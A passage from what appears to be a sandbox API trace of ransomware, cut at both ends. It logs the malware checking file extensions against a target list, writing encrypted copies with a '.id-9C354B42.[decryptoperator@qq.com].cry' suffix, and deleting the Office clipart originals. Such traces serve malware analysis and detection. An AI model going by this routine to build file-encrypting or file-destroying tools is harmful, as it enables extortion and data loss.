OLEDB\\10\\Cartridges\\Sybase.xsl") returned 78 [0050.805] lstrlenW (lpString=".doc") returned 4 [0050.805] lstrcmpiW (lpString1=".doc", lpString2=".xsl") returned -1 [0050.805] lstrlenW (lpString=".docx") returned 5 [0050.805] lstrcmpiW (lpString1=".docx", lpString2="e.xsl") returned -1 [0050.805] lstrlenW (lpString=".pdf") returned 4 [0050.805] lstrcmpiW (lpString1=".pdf", lpString2=".xsl") returned -1 [0050.805] lstrlenW (lpString=".xls") returned 4 [0050.805] lstrcmpiW (lpString1=".xls", lpString2=".xsl") returned -1 [0050.805] lstrlenW (lpString=".xlsx") returned 5 [0050.805] lstrcmpiW (lpString1=".xlsx", lpString2="e.xsl") returned -1 [0050.805] lstrlenW (lpString=".ppt") returned 4 [0050.805] lstrcmpiW (lpString1=".ppt", lpString2=".xsl") returned -1 [0050.805] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl") returned 78 [0050.805] lstrlenW (lpString=".zip") returned 4 [0050.805] lstrcmpiW (lpString1=".zip", lpString2=".xsl") returned 1 [0050.805] lstrlenW (lpString=".rar") returned 4 [0050.805] lstrcmpiW (lpString1=".rar", lpString2=".xsl") returned -1 [0050.805] lstrlenW (lpString=".bz2") returned 4 [0050.806] lstrcmpiW (lpString1=".bz2", lpString2=".xsl") returned -1 [0050.806] lstrlenW (lpString=".7z") returned 3 [0050.806] lstrcmpiW (lpString1=".7z", lpString2="xsl") returned -1 [0050.806] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl") returned 78 [0050.806] lstrlenW (lpString=".dbf") returned 4 [0050.806] lstrcmpiW (lpString1=".dbf", lpString2=".xsl") returned -1 [0050.806] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl") returned 78 [0050.806] lstrlenW (lpString=".1cd") returned 4 [0050.806] lstrcmpiW (lpString1=".1cd", lpString2=".xsl") returned -1 [0050.806] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl") returned 78 [0050.806] lstrlenW (lpString=".jpg") returned 4 [0050.806] lstrcmpiW (lpString1=".jpg", lpString2=".xsl") returned -1 [0051.317] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0051.317] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0051.317] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00011_.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0051.317] GetLastError () returned 0x0 [0051.317] ReadFile (in: hFile=0x210, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x1c30, lpOverlapped=0x0) returned 1 [0051.414] WriteFile (in: hFile=0x228, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0x1c40, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0x1c40, lpOverlapped=0x0) returned 1 [0051.415] ReadFile (in: hFile=0x210, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x0, lpOverlapped=0x0) returned 1 [0051.415] WriteFile (in: hFile=0x228, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xec, lpOverlapped=0x0) returned 1 [0051.415] SetEndOfFile (hFile=0x228) returned 1 [0051.419] CloseHandle (hObject=0x228) returned 1 [0051.419] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0051.419] SetEndOfFile (hFile=0x210) returned 1 [0051.423] CloseHandle (hObject=0x210) returned 1 [0051.423] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0051.423] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00011_.gif")) returned 1 [0051.423] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 63 [0051.423] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 63 [0051.423] lstrlenW (lpString=".doc") returned 4 [0051.423] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0051.423] lstrlenW (lpString=".docx") returned 5 [0051.423] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0051.423] lstrlenW (lpString=".pdf") returned 4 [0051.423] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0051.423] lstrlenW (lpString=".xls") returned 4 [0051.423] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0051.423] lstrlenW (lpString=".xlsx") returned 5 [0051.424] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0051.424] lstrlenW (lpString=".ppt") returned 4 [0051.424] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0051.424] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 63 [0051.424] lstrlenW (lpString=".zip") returned 4 [0051.424] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0051.424] lstrlenW (lpString=".rar") returned 4 [0051.424] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0051.424] lstrlenW (lpString=".bz2") returned 4 [0051.424] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0051.424] lstrlenW (lpString=".7z") returned 3 [0051.424] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0051.424] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 63 [0051.424] lstrlenW (lpString=".dbf") returned 4 [0051.424] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0051.424] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 63 [0051.424] lstrlenW (lpString=".1cd") returned 4 [0051.424] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0051.424] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 63 [0051.424] lstrlenW (lpString=".jpg") returned 4 [0051.424] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0051.424] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=13254) returned 1 [0051.424] CloseHandle (hObject=0x210) returned 1 [0051.424] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00164_.gif")) returned 0x20 [0051.424] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00164_.gif.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0051.425] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00164_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0051.425] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0051.426] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0051.426] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00164_.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac [0051.426] GetLastError () returned 0x0 [0051.426] ReadFile (in: hFile=0x210, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x33c6, lpOverlapped=0x0) returned 1 [0051.446] WriteFile (in: hFile=0x1ac, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0x33d0, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0x33d0, lpOverlapped=0x0) returned 1 [0051.447] ReadFile (in: hFile=0x210, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x0, lpOverlapped=0x0) returned 1 [0051.447] WriteFile (in: hFile=0x1ac, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xec, lpOverlapped=0x0) returned 1 [0051.447] SetEndOfFile (hFile=0x1ac) returned 1 [0051.450] CloseHandle (hObject=0x1ac) returned 1 [0051.451] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0051.451] SetEndOfFile (hFile=0x210) returned 1 [0051.453] CloseHandle (hObject=0x210) returned 1 [0051.453] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0051.453] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00164_.gif")) returned 1 [0051.453] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 63 [0051.453] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 63 [0051.453] lstrlenW (lpString=".doc") returned 4 [0051.453] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0051.453] lstrlenW (lpString=".docx") returned 5 [0051.453] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0051.453] lstrlenW (lpString=".pdf") returned 4 [0051.453] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0051.453] lstrlenW (lpString=".xls") returned 4 [0051.453] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0051.453] lstrlenW (lpString=".xlsx") returned 5 [0051.453] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0051.454] lstrlenW (lpString=".ppt") returned 4 [0051.454] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0051.454] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 63 [0051.454] lstrlenW (lpString=".zip") returned 4 [0051.454] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0051.454] lstrlenW (lpString=".rar") returned 4 [0051.454] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0051.454] lstrlenW (lpString=".bz2") returned 4 [0051.454] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0051.454] lstrlenW (lpString=".7z") returned 3 [0051.454] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0051.454] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 63 [0051.454] lstrlenW (lpString=".dbf") returned 4 [0051.454] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0051.454] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 63 [0051.454] lstrlenW (lpString=".1cd") returned 4 [0051.454] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0051.454] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 63 [0051.454] lstrlenW (lpString=".jpg") returned 4 [0051.454] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0051.454] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=4894) returned 1 [0051.454] CloseHandle (hObject=0x210) returned 1 [0051.455] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00167_.gif")) returned 0x20 [0051.455] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00167_.gif.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0051.455] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00167_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0051.455] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0051.455] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0051.455] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00167_.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac [0051.455] GetLastError () returned 0x0 [0051.455] ReadFile (in: hFile=0x210, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x131e, lpOverlapped=0x0) returned 1 [0051.475] WriteFile (in: hFile=0x1ac, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0x1320, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0x1320, lpOverlapped=0x0) returned 1 [0051.476] ReadFile (in: hFile=0x210, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x0, lpOverlapped=0x0) returned 1 [0051.476] WriteFile (in: hFile=0x1ac, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xec, lpOverlapped=0x0) returned 1 [0051.476] SetEndOfFile (hFile=0x1ac) returned 1 [0051.477] CloseHandle (hObject=0x1ac) returned 1 [0051.477] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0051.477] SetEndOfFile (hFile=0x210) returned 1 [0051.477] CloseHandle (hObject=0x210) returned 1 [0051.477] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0051.478] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00167_.gif")) returned 1 [0051.478] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF") returned 63 [0051.478] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF") returned 63 [0051.478] lstrlenW (lpString=".doc") returned 4 [0051.478] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0051.478] lstrlenW (lpString=".docx") returned 5 [0051.478] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0051.478] lstrlenW (lpString=".pdf") returned 4 [0051.478] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0051.478] lstrlenW (lpString=".xls") returned 4 [0051.478] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0051.478] lstrlenW (lpString=".xlsx") returned 5 [0051.478] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0051.478] lstrlenW (lpString=".ppt") returned 4 [0051.478] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0051.478] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF") returned 63 [0051.478] lstrlenW (lpString=".zip") returned 4 [0051.478] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0051.478] lstrlenW (lpString=".rar") returned 4 [0051.478] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0051.478] lstrlenW (lpString=".bz2") returned 4 [0051.478] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0051.478] lstrlenW (lpString=".7z") returned 3 [0051.478] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0051.478] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF") returned 63 [0051.478] lstrlenW (lpString=".dbf") returned 4 [0051.479] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0051.479] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF") returned 63 [0051.479] lstrlenW (lpString=".1cd") returned 4 [0051.479] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0051.479] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF") returned 63 [0051.479] lstrlenW (lpString=".jpg") returned 4 [0051.479] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0051.479] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=5375) returned 1 [0051.479] CloseHandle (hObject=0x210) returned 1 [0051.479] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00169_.gif")) returned 0x20 [0051.479] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00169_.gif.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0051.479] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00169_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0051.479] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0051.479] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0051.479] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00169_.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac [0051.480] GetLastError () returned 0x0 [0051.480] ReadFile (in: hFile=0x210, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x14ff, lpOverlapped=0x0) returned 1 [0051.505] WriteFile (in: hFile=0x1ac, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0x1500, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0x1500, lpOverlapped=0x0) returned 1 [0051.506] ReadFile (in: hFile=0x210, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x0, lpOverlapped=0x0) returned 1 [0051.506] WriteFile (in: hFile=0x1ac, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xec, lpOverlapped=0x0) returned 1 [0051.506] SetEndOfFile (hFile=0x1ac) returned 1 [0051.506] CloseHandle (hObject=0x1ac) returned 1 [0051.506] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0051.506] SetEndOfFile (hFile=0x210) returned 1 [0051.507] CloseHandle (hObject=0x210) returned 1 [0051.507] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0051.507] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00169_.gif")) returned 1 [0051.507] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 63 [0051.507] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 63 [0051.507] lstrlenW (lpString=".doc") returned 4 [0051.507] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0051.507] lstrlenW (lpString=".docx") returned 5 [0051.507] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0051.507] lstrlenW (lpString=".pdf") returned 4 [0051.507] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0051.507] lstrlenW (lpString=".xls") returned 4 [0051.507] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0051.507] lstrlenW (lpString=".xlsx") returned 5 [0051.508] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0051.508] lstrlenW (lpString=".ppt") returned 4 [0051.508] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0051.508] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 63 [0051.508] lstrlenW (lpString=".zip") returned 4 [0051.508] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0051.508] lstrlenW (lpString=".rar") returned 4 [0051.508] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0051.508] lstrlenW (lpString=".bz2") returned 4 [0051.508] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0051.508] lstrlenW (lpString=".7z") returned 3 [0051.508] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0051.508] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 63 [0051.508] lstrlenW (lpString=".dbf") returned 4 [0051.508] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0051.508] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 63 [0051.508] lstrlenW (lpString=".1cd") returned 4 [0051.508] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0051.508] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 63 [0051.508] lstrlenW (lpString=".jpg") returned 4 [0051.508] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0051.508] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=5016) returned 1 [0051.508] CloseHandle (hObject=0x210) returned 1 [0051.508] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00171_.gif")) returned 0x20 [0051.509] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00171_.gif.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0051.509] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00171_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0051.509] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0051.509] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0051.509] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00171_.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac [0051.509] GetLastError () returned 0x0 [0051.509] ReadFile (in: hFile=0x210, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: 